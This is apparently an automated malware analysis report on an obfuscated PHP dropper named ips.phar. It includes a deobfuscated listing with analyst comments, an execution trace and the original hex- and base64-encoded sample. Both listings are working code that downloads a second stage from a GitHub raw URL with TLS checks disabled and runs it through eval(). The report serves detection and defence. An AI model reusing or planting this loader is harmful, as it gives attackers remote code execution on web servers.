PHP Malware Analysis

ips.phar

md5: 1d3310dfd825ad02ae27d5c5bf628ece


Deobfuscated PHP code

<?php

/*
		Bypass Server By SasKraXploit X Indonesian Predator 2021
		Thanks to :
		-karma
		-W4NT3K
*/
// Analyst notes (deobfuscated listing). The first three globals hold the
// *names* of variables used later ($hvfkNqlpzhXRcuerqjdZ, $NUwGojaMFrWOXnaoPPXm,
// $SCvWTGyfCYyeLdjcFFzo); the original sample dereferences them through
// variable-variables (${$GLOBALS[...]}) to hide which variable is touched.
// In this flattened listing they are written but never read.
$GLOBALS["yafdnr"] = "hvfkNqlpzhXRcuerqjdZ";
$GLOBALS["hyokzipym"] = "NUwGojaMFrWOXnaoPPXm";
$GLOBALS["ypjsezxo"] = "SCvWTGyfCYyeLdjcFFzo";
// Second-stage URL (base64-encoded in the original; see trace entries for base64_decode).
// This is the network indicator to alert on; the fetched body is passed straight to eval().
$GLOBALS["sLErLvRClfMwlwzfmZia"] = "https://raw.githubusercontent.com/Saskraxploit/shell/main/wn";
// Name of a global ("coki") that is looked up for the cookie jar/file but never assigned,
// so $GLOBALS["coki"] resolves to NULL (the trace shows NULL passed to both curl_setopt calls).
$GLOBALS["voBIXqddThsMvzHcUXzW"] = "coki";
// Hard-coded User-Agent sent with the download request; a fixed, outdated UA string
// like this is a usable detection pivot in egress proxy logs.
$GLOBALS["TcxoXNboAIbTBtucYEXv"] = "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0";
// Empty string; concatenated on both sides of the URL in curl_init() as filler (no effect).
$GLOBALS["SnsSSwMKZSYeMFnEirnh"] = "";
/**
 * Downloader stage: fetches the body of a remote URL over cURL and returns it.
 *
 * Behaviour visible in this listing:
 *  - follows redirects, sends the hard-coded User-Agent from the globals above;
 *  - disables TLS certificate and hostname verification, so the payload source
 *    is not authenticated and a man-in-the-middle position can substitute it;
 *  - returns whatever curl_exec() yields: the response body as a string (because
 *    CURLOPT_RETURNTRANSFER is set) or false on transport failure; there is no
 *    status-code check, which is why the trace shows the literal '404: Not Found'
 *    body being returned and later eval'd.
 *
 * The stray $GLOBALS[...] and local assignments are dead stores left over from the
 * variable-variable obfuscation of the original sample; they do nothing here.
 *
 * @param string $gXNjWLFkUQOugyREMXKv URL to fetch
 * @return string|false response body, or false if cURL failed
 */
function QBBTMsykcviWncPerRkb($gXNjWLFkUQOugyREMXKv)
{
    // Dead stores (obfuscation residue): never read in this listing.
    $GLOBALS["djrwfutdivx"] = "NUwGojaMFrWOXnaoPPXm";
    $GLOBALS["kyugkupss"] = "SCvWTGyfCYyeLdjcFFzo";
    $egjidpo = "SCvWTGyfCYyeLdjcFFzo";
    $GLOBALS["pgkandya"] = "SCvWTGyfCYyeLdjcFFzo";
    $GLOBALS["bdclkhnbm"] = "gXNjWLFkUQOugyREMXKv";
    // The empty global on each side of the URL is filler; the handle targets the URL unchanged
    // (the trace shows curl_init() receiving the bare URL).
    $SCvWTGyfCYyeLdjcFFzo = curl_init($GLOBALS["SnsSSwMKZSYeMFnEirnh"] . $gXNjWLFkUQOugyREMXKv . $GLOBALS["SnsSSwMKZSYeMFnEirnh"]);
    // More dead stores.
    $pdsfhqkte = "SCvWTGyfCYyeLdjcFFzo";
    $nsbifh = "SCvWTGyfCYyeLdjcFFzo";
    $GLOBALS["yjcvttcg"] = "SCvWTGyfCYyeLdjcFFzo";
    // Return the body from curl_exec() instead of writing it to stdout.
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
    $xmlxsygsmr = "SCvWTGyfCYyeLdjcFFzo";
    // Follow HTTP redirects (a redirect could move the payload source off the listed host).
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_USERAGENT, $GLOBALS["TcxoXNboAIbTBtucYEXv"]);
    // TLS verification fully disabled: no peer-certificate check, no hostname check.
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_SSL_VERIFYHOST, 0);
    // $GLOBALS["coki"] is never set anywhere in the script, so both cookie options receive NULL
    // (confirmed by the execution trace); no cookie file is created on disk by this stage.
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_COOKIEJAR, $GLOBALS[$GLOBALS["voBIXqddThsMvzHcUXzW"]]);
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_COOKIEFILE, $GLOBALS[$GLOBALS["voBIXqddThsMvzHcUXzW"]]);
    // No HTTP status or error handling: any body (including an error page) is returned as-is,
    // and the handle is never closed.
    $NUwGojaMFrWOXnaoPPXm = curl_exec($SCvWTGyfCYyeLdjcFFzo);
    return $NUwGojaMFrWOXnaoPPXm;
}
// Fetch the second stage from the remote URL held in the globals above.
$hvfkNqlpzhXRcuerqjdZ = QBBTMsykcviWncPerRkb($GLOBALS["sLErLvRClfMwlwzfmZia"]);
// Remote code execution sink. The leading "?>" drops eval() out of PHP mode, so the fetched
// body is emitted as raw output and any "<?php" block inside it runs as code — whoever controls
// the URL (or a redirect target, or the unauthenticated TLS session) controls what executes.
// If curl_exec() returned false, the string is just "?>" and nothing runs. In the captured trace
// the host answered '404: Not Found', which eval() simply echoed (see "Generated HTML code").
eval("?>" . $hvfkNqlpzhXRcuerqjdZ);

Execution traces

data/traces/1d3310dfd825ad02ae27d5c5bf628ece_trace-1676249166.2127.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:46:32.110582]
1	0	1	0.000181	393512
1	3	0	0.000344	412344	{main}	1		/var/www/html/uploads/ips.phar	0	0
1		A						/var/www/html/uploads/ips.phar	10	GLOBALS['yafdnr'] = 'hvfkNqlpzhXRcuerqjdZ'
1		A						/var/www/html/uploads/ips.phar	10	GLOBALS['hyokzipym'] = 'NUwGojaMFrWOXnaoPPXm'
1		A						/var/www/html/uploads/ips.phar	10	GLOBALS['ypjsezxo'] = 'SCvWTGyfCYyeLdjcFFzo'
2	4	0	0.000405	412344	base64_decode	0		/var/www/html/uploads/ips.phar	10	1	'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1Nhc2tyYXhwbG9pdC9zaGVsbC9tYWluL3du'
2	4	1	0.000424	412488
2	4	R			'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
1		A						/var/www/html/uploads/ips.phar	10	GLOBALS['sLErLvRClfMwlwzfmZia'] = 'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
2	5	0	0.000458	412456	base64_decode	0		/var/www/html/uploads/ips.phar	10	1	'Y29raQ=='
2	5	1	0.000472	412528
2	5	R			'coki'
1		A						/var/www/html/uploads/ips.phar	10	GLOBALS['voBIXqddThsMvzHcUXzW'] = 'coki'
2	6	0	0.000498	412496	base64_decode	0		/var/www/html/uploads/ips.phar	10	1	'TW96aWxsYS81LjAoV2luZG93cyBOVCA2LjE7IHJ2OjMyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvMzIuMA=='
2	6	1	0.000516	412656
2	6	R			'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
1		A						/var/www/html/uploads/ips.phar	10	GLOBALS['TcxoXNboAIbTBtucYEXv'] = 'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
2	7	0	0.000551	412624	base64_decode	0		/var/www/html/uploads/ips.phar	10	1	''
2	7	1	0.000564	412688
2	7	R			''
1		A						/var/www/html/uploads/ips.phar	10	GLOBALS['SnsSSwMKZSYeMFnEirnh'] = ''
2	8	0	0.000590	412632	QBBTMsykcviWncPerRkb	1		/var/www/html/uploads/ips.phar	10	1	'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
2		A						/var/www/html/uploads/ips.phar	10	GLOBALS['djrwfutdivx'] = 'NUwGojaMFrWOXnaoPPXm'
2		A						/var/www/html/uploads/ips.phar	10	GLOBALS['kyugkupss'] = 'SCvWTGyfCYyeLdjcFFzo'
2		A						/var/www/html/uploads/ips.phar	10	$egjidpo = 'SCvWTGyfCYyeLdjcFFzo'
2		A						/var/www/html/uploads/ips.phar	10	GLOBALS['pgkandya'] = 'SCvWTGyfCYyeLdjcFFzo'
2		A						/var/www/html/uploads/ips.phar	10	GLOBALS['bdclkhnbm'] = 'gXNjWLFkUQOugyREMXKv'
3	9	0	0.000670	413008	curl_init	0		/var/www/html/uploads/ips.phar	10	1	'https://raw.githubusercontent.com/Saskraxploit/shell/main/wn'
3	9	1	0.000692	413952
3	9	R			resource(4) of type (curl)
2		A						/var/www/html/uploads/ips.phar	10	$SCvWTGyfCYyeLdjcFFzo$egjidpoSCvWTGyfCYyeLdjcFFzo = resource(4) of type (curl)
2		A						/var/www/html/uploads/ips.phar	10	$pdsfhqkte = 'SCvWTGyfCYyeLdjcFFzo'
2		A						/var/www/html/uploads/ips.phar	10	$nsbifh = 'SCvWTGyfCYyeLdjcFFzo'
2		A						/var/www/html/uploads/ips.phar	10	GLOBALS['yjcvttcg'] = 'SCvWTGyfCYyeLdjcFFzo'
3	10	0	0.000768	413920	curl_setopt	0		/var/www/html/uploads/ips.phar	10	3	resource(4) of type (curl)	19913	1
3	10	1	0.000784	414016
3	10	R			TRUE
2		A						/var/www/html/uploads/ips.phar	10	$xmlxsygsmr = 'SCvWTGyfCYyeLdjcFFzo'
3	11	0	0.000809	413920	curl_setopt	0		/var/www/html/uploads/ips.phar	10	3	resource(4) of type (curl)	52	1
3	11	1	0.000824	414016
3	11	R			TRUE
3	12	0	0.000837	413920	curl_setopt	0		/var/www/html/uploads/ips.phar	10	3	resource(4) of type (curl)	10018	'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
3	12	1	0.000855	414016
3	12	R			TRUE
3	13	0	0.000868	413920	curl_setopt	0		/var/www/html/uploads/ips.phar	10	3	resource(4) of type (curl)	64	0
3	13	1	0.000882	414016
3	13	R			TRUE
3	14	0	0.000895	413920	curl_setopt	0		/var/www/html/uploads/ips.phar	10	3	resource(4) of type (curl)	81	0
3	14	1	0.000911	414016
3	14	R			TRUE
3	15	0	0.000946	413920	curl_setopt	0		/var/www/html/uploads/ips.phar	10	3	resource(4) of type (curl)	10082	NULL
3	15	1	0.000980	414016
3	15	R			TRUE
3	16	0	0.001009	413920	curl_setopt	0		/var/www/html/uploads/ips.phar	10	3	resource(4) of type (curl)	10031	NULL
3	16	1	0.001029	414016
3	16	R			TRUE
3	17	0	0.001050	413920	curl_exec	0		/var/www/html/uploads/ips.phar	10	1	resource(4) of type (curl)
3	17	1	0.036710	414208
3	17	R			'404: Not Found'
2		A						/var/www/html/uploads/ips.phar	10	$NUwGojaMFrWOXnaoPPXmNUwGojaMFrWOXnaoPPXm = '404: Not Found'
2	8	1	0.037028	413264
2	8	R			'404: Not Found'
1		A						/var/www/html/uploads/ips.phar	10	$hvfkNqlpzhXRcuerqjdZhvfkNqlpzhXRcuerqjdZ = '404: Not Found'
2	18	0	0.037099	413800	eval	1	'?>404: Not Found'	/var/www/html/uploads/ips.phar	10	0
2	18	1	0.037115	413800
1	3	1	0.037123	413392
			0.037171	329152
TRACE END   [2023-02-12 22:46:32.147610]


Generated HTML code

<html><head></head><body>404: Not Found</body></html>

Original PHP code

<?php 
	/*
		Bypass Server By SasKraXploit X Indonesian Predator 2021
		Thanks to :
		-karma
		-W4NT3K

    */
  
/*
 * Analyst notes (original sample, obfuscated form). The same logic as the
 * deobfuscated listing above: global variable names and all string constants are
 * spelled with hex escapes ("\x47L\x4f..." is "GLOBALS"), the URL, the "coki" key
 * and the User-Agent are base64-decoded at runtime, and variables are reached
 * through variable-variables (${$GLOBALS["..."]}) so that static greps for the
 * curl handle or the eval'd string find nothing. Every execution-trace entry
 * reports source line 10, consistent with the whole script sitting on a single
 * physical line; the line break inside the last curl_exec() argument below looks
 * like page wrapping rather than part of the sample. Detection pivots that
 * survive this obfuscation: the base64_decode()->curl_init()->curl_exec()->eval()
 * call sequence, CURLOPT_SSL_VERIFYPEER/HOST set to 0, and eval() on a string
 * that begins with "?>".
 */
${"\x47L\x4f\x42\x41\x4cS"}["\x79a\x66\x64\x6e\x72"]="\x68v\x66\x6b\x4e\x71\x6c\x70zh\x58\x52\x63\x75\x65\x72q\x6ad\x5a";${"G\x4c\x4fBA\x4cS"}["\x68\x79\x6fkzi\x70ym"]="N\x55\x77\x47\x6fj\x61\x4d\x46r\x57\x4f\x58n\x61\x6fPPX\x6d";${"G\x4cOBAL\x53"}["y\x70\x6a\x73ez\x78\x6f"]="\x53\x43\x76\x57\x54\x47y\x66\x43Y\x79\x65Ld\x6ac\x46\x46\x7ao";$GLOBALS["s\x4cE\x72L\x76R\x43lf\x4dw\x6cw\x7a\x66mZi\x61"]=base64_decode("\x61H\x520\x63\x48\x4d6Ly\x39\x79\x59\x58c\x75\x5a2l0a\x48\x56i\x64XN\x6c\x63mN\x76b\x6e\x52\x6cb\x6e\x51\x75Y\x32\x39t\x4c1\x4ehc2t\x79\x59\x58h\x77\x62\x479\x70\x64\x439z\x61\x47Vs\x62C9t\x59Wl\x75\x4c\x33\x64\x75");$GLOBALS["\x76oB\x49\x58\x71d\x64\x54\x68sMvzH\x63U\x58\x7aW"]=base64_decode("\x592\x39r\x61Q\x3d=");$GLOBALS["T\x63x\x6f\x58N\x62\x6fAI\x62TB\x74\x75\x63\x59E\x58\x76"]=base64_decode("\x54\x57\x39\x36\x61W\x78\x73\x59S\x381\x4cjA\x6fV\x32\x6c\x75\x5a\x47\x393\x63y\x42O\x56\x43\x412LjE\x37\x49\x48\x4a2\x4f\x6aMy\x4cjA\x70\x49E\x64\x6cY2tv\x4czI\x77M\x54A\x77M\x54\x41\x78I\x45Z\x70c\x6dVm\x623\x67\x76\x4d\x7aI\x75\x4dA\x3d=");$GLOBALS["\x53\x6e\x73\x53\x53\x77\x4dK\x5a\x53YeMF\x6eE\x69\x72n\x68"]=base64_decode("");function 
QBBTMsykcviWncPerRkb($gXNjWLFkUQOugyREMXKv){${"\x47LO\x42\x41\x4c\x53"}["\x64\x6a\x72\x77\x66u\x74d\x69\x76\x78"]="\x4eU\x77G\x6f\x6a\x61M\x46\x72\x57\x4f\x58n\x61\x6f\x50\x50\x58\x6d";${"\x47\x4cO\x42\x41L\x53"}["\x6b\x79\x75\x67\x6b\x75\x70\x73s"]="S\x43\x76WT\x47\x79\x66C\x59\x79e\x4cd\x6a\x63FFzo";$egjidpo="\x53\x43v\x57T\x47\x79\x66\x43Y\x79eL\x64\x6a\x63F\x46\x7a\x6f";${"GL\x4f\x42\x41L\x53"}["\x70\x67\x6b\x61\x6edya"]="\x53\x43\x76\x57T\x47\x79f\x43\x59y\x65\x4cd\x6ac\x46\x46z\x6f";${"\x47\x4c\x4fBALS"}["\x62dcl\x6b\x68\x6e\x62m"]="\x67\x58\x4ejW\x4c\x46k\x55\x51\x4f\x75g\x79\x52\x45\x4dX\x4b\x76";${$egjidpo}=curl_init($GLOBALS["\x53nsSS\x77M\x4bZSY\x65MF\x6e\x45\x69\x72\x6eh"].${${"G\x4c\x4fBAL\x53"}["\x62\x64\x63l\x6b\x68\x6e\x62\x6d"]}.$GLOBALS["\x53\x6e\x73\x53Sw\x4dKZ\x53Y\x65MF\x6e\x45\x69\x72\x6eh"]);$pdsfhqkte="\x53\x43v\x57\x54G\x79\x66CY\x79\x65\x4c\x64\x6a\x63\x46\x46\x7a\x6f";$nsbifh="\x53C\x76WT\x47y\x66CY\x79e\x4cd\x6ac\x46Fzo";${"\x47LOB\x41\x4c\x53"}["\x79\x6ac\x76\x74\x74\x63\x67"]="\x53Cv\x57\x54\x47y\x66CY\x79\x65\x4c\x64\x6a\x63\x46\x46\x7a\x6f";curl_setopt(${${"G\x4c\x4fBA\x4c\x53"}["p\x67k\x61n\x64\x79a"]},CURLOPT_RETURNTRANSFER,1);$xmlxsygsmr="\x53\x43vW\x54Gy\x66C\x59\x79\x65\x4c\x64jcFF\x7ao";curl_setopt(${$nsbifh},CURLOPT_FOLLOWLOCATION,1);curl_setopt(${${"GL\x4fB\x41\x4cS"}["\x79\x70jse\x7a\x78\x6f"]},CURLOPT_USERAGENT,$GLOBALS["\x54cx\x6fXNbo\x41\x49\x62\x54B\x74\x75\x63\x59EX\x76"]);curl_setopt(${$xmlxsygsmr},CURLOPT_SSL_VERIFYPEER,0);curl_setopt(${${"\x47\x4c\x4fB\x41\x4cS"}["\x6b\x79u\x67k\x75p\x73s"]},CURLOPT_SSL_VERIFYHOST,0);curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x79j\x63\x76\x74\x74\x63g"]},CURLOPT_COOKIEJAR,$GLOBALS[$GLOBALS["v\x6fBI\x58qd\x64T\x68s\x4d\x76z\x48c\x55Xz\x57"]]);curl_setopt(${$pdsfhqkte},CURLOPT_COOKIEFILE,$GLOBALS[$GLOBALS["v\x6fBI\x58\x71\x64d\x54\x68s\x4dv\x7a\x48c\x55\x58z\x57"]]);${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x64j\x72\x77f\x75\x74d\x69\x76x"]}=curl_exec(${${"\x47\x4c\x4f\x42\x41\x4cS"}["y
p\x6as\x65\x7a\x78\x6f"]});return${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x68\x79\x6f\x6b\x7ai\x70\x79\x6d"]};}${${"\x47L\x4f\x42\x41\x4c\x53"}["\x79\x61fdn\x72"]}=QBBTMsykcviWncPerRkb($GLOBALS["sLE\x72L\x76\x52C\x6cf\x4d\x77l\x77z\x66m\x5a\x69a"]);eval("?\x3e".${${"GLO\x42\x41\x4cS"}["ya\x66\x64\x6e\x72"]});
// Closing tag: after the eval() above, whatever the remote host returned has already been
// emitted as output (or executed if it carried a PHP open tag).
?>